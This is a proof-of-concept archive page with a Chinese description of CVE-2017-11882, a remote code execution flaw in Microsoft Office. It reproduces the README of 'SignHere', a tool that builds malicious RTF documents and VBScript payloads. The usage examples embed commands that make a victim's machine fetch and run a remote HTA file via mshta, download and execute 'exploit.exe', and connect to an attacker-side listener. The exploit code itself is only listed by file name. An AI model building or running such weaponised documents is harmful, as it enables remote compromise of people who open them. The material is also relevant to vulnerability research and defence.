关联漏洞
标题:
Microsoft Office 安全漏洞
(CVE-2017-11882)
描述:Microsoft Office 2007 SP3等都是美国微软(Microsoft)公司开发的办公软件套件产品。 Microsoft Office中存在远程代码执行漏洞,该漏洞源于程序没有正确的处理内存中的对象。远程攻击者可借助特制的文件利用该漏洞在当前用户的上下文中执行任意代码。以下版本受到影响:Microsoft Office 2007 SP3,Microsoft Office 2010 SP2,Microsoft Office 2013 SP1,Microsoft Office 2016。
描述
SignHere is implementation of CVE-2017-11882. SignHere is builder of malicious rtf document and VBScript payloads.
介绍
## SignHere
# Introduction
<b>CVE-2017-11882</b> - The unique vulnerability identifier of Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allows an attacker to run code in the context of the current user without properly handling objects in memory, the so-called "Microsoft Office Memory corruption vulnerability".
The implementation includes creating a program for building malicious rtf documents and payloads in VBScript
<b>The principle of operation</b>
--
It is rtf documents that are vulnerable for the reason that they can be "programmed" by knowing special commands-RTF Headers. Thus, a binary (executable) object is created in the body of the document, in fact, it is a Microsoft Equation formula with the code that contains the cmd command. Then you can generate the payload in VBScript and use the command " mshta link to the payload file” to execute the hta file.
<br>
# Attention!
Author and contributors <b>are not responsible</b> for any damage caused to you or by you.
## Installation
The program requires [Python 3](https://www.python.org) for executing.
--
<b>Linux</b>
--
You can use <b>Termux</b>, but execution of program requires <b>root</b>
```sh
git clone https://github.com/Retr0-code/SignHere/
cd SignHere/
chmod +x SignHere.py
./SignHere.py --help
```
<br>
<b>Windows</b>
--
First, you need to download the [archive](https://github.com/Retr0-code/SignHere/archive/main.zip). Then unpack it and open a PowerShell window in this folder and write:
```sh
.\SignHere.py --help
```
## Usage
```python
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --powershell "start iexplore.exe https://github.com/Retr0-code/SignHere" --ip 192.168.1.74 --output generated.rtf
```
<b>--cmd</b>
Argument with Windows command that will be executed after opening document.
<b>--powershell</b>
Argument with powershell command that will be in VBScript payload.
<b>--ip</b>
Argument with ip address that will be used for web-server. (default: 127.0.0.1)
<b>--output</b>
Name and path of document.
<br>
```python
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --temp exploit.exe --ip 192.168.1.74 --output generated.rtf
```
<b>--temp</b>
Argument that will use binary file as payload (binary file will start in RAM memory).
<br>
```python
./SignHere.py --cmd "mshta http://192.168.1.74/pay.hta" --payload exploit.exe --ip 192.168.1.74 --listener-host 192.168.1.74 --output generated.rtf
```
<b>--payload</b>
Argument that will download file on computer of victim and execute it.
<b>--listener-host</b>
Argument for starting TCP listener on current ip (default: 127.0.0.1)
文件快照
[4.0K] /data/pocs/a1251212efe9ee2c8377f05018ab5637e6fcfcdd
├── [4.0K] libs
│ ├── [1.9K] listener.py
│ ├── [2.8K] payloadGen.py
│ ├── [9.9K] rtfExploit.py
│ └── [ 371] server.py
├── [ 34K] LICENSE
├── [2.6K] README.md
└── [5.0K] SignHere.py
1 directory, 7 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。